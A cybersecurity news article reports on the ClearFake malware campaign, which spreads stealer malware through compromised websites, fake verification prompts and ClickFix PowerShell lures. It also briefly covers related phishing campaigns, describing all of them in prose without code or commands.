The ClearFake campaign has infected at least 9,300 websites, employing fake reCAPTCHA and Cloudflare Turnstile verifications to lure users into downloading malicious software, including Lumma Stealer and Vidar Stealer. First identified in July 2023, ClearFake utilizes compromised WordPress sites as a vector for malware distribution, primarily relying on fake web browser update prompts.
ClearFake campaign infects 9,300 websites
ClearFake has also adopted the EtherHiding technique to enhance the resilience of its attack chain, utilizing Binance’s Smart Chain (BSC) contracts to fetch subsequent payloads. The primary objective of these infection chains is to deliver information-stealing malware targeting both Windows and macOS systems.
By May 2024, ClearFake had incorporated what is referred to as ClickFix, a social engineering tactic designed to trick users into executing malicious PowerShell code under the pretense of resolving a non-existent technical issue. According to Sekoia’s analysis, the new variant maintains its reliance on EtherHiding while also facilitating additional interactions with the Binance Smart Chain.
These interactions involve using the smart contract’s Application Binary Interfaces to load multiple JavaScript codes and additional resources. These resources serve to fingerprint the victim’s system and download, decrypt, and display the ClickFix lure. The latest ClearFake iteration has integrated Web3 capabilities to thwart analysis while encrypting the HTML code related to ClickFix.
The attack sequence begins when a user visits a compromised site, leading to the retrieval of intermediate JavaScript code from BSC. This JavaScript is responsible for fingerprinting the system and fetching the encrypted ClickFix code hosted on Cloudflare Pages. If the victim executes the malicious PowerShell command, the Emmenhtal Loader (also known as PEAKLIGHT) deploys, subsequently introducing Lumma Stealer. In late January 2025, an alternate attack chain was observed that used a PowerShell loader to install Vidar Stealer.
ClearFake operators have reportedly updated the framework code, lures, and payload distributions daily. The malware execution now relies on various data stored within the Binance Smart Chain, including JavaScript code, AES keys, URLs for lure HTML files, and ClickFix PowerShell commands. The prevalence of compromised websites suggests that this threat continues to pose a significant risk, with approximately 200,000 unique users potentially exposed to ClearFake lures in July 2024.
Badbox 2.0 malware is infecting a million Android devices right now
In a related finding, over 100 auto dealership websites have been compromised with ClickFix lures that deploy SectopRAT malware. Security researcher Randy McEoin noted that this infection originated not from the dealerships’ own websites but from a third-party video service, LES Automotive (idostream[.]com), which has since removed the malicious JavaScript injection.
These developments coincide with various phishing campaigns aimed at distributing multiple malware families and harvesting credentials. Methods identified include the use of virtual hard disk (VHD) files embedded in archived email attachments to deliver Venom RAT via a Windows batch script, and exploitative Microsoft Excel file attachments utilizing a known security vulnerability (CVE-2017-0199) to download an HTML Application (HTA) that leverages Visual Basic Script (VBS) for further malware deployment.
Additionally, there are reports of exploiting misconfigurations in Microsoft 365 infrastructure to gain control of tenants, create administrative accounts, and deliver phishing content that evades email security measures, ultimately enabling credential harvesting and account takeover (ATO).
As social engineering tactics evolve, organizations must implement robust authentication and access-control mechanisms to guard against Adversary-in-the-Middle (AitM) and Browser-in-the-Middle (BitM) techniques that facilitate account hijacking. A report from Mandiant highlighted the speed at which BitM frameworks can target websites, allowing attackers to serve legitimate sites through attacker-controlled browsers, complicating the distinction between genuine and fraudulent sites for victims.
Featured image credit: Pixabay/Pexels
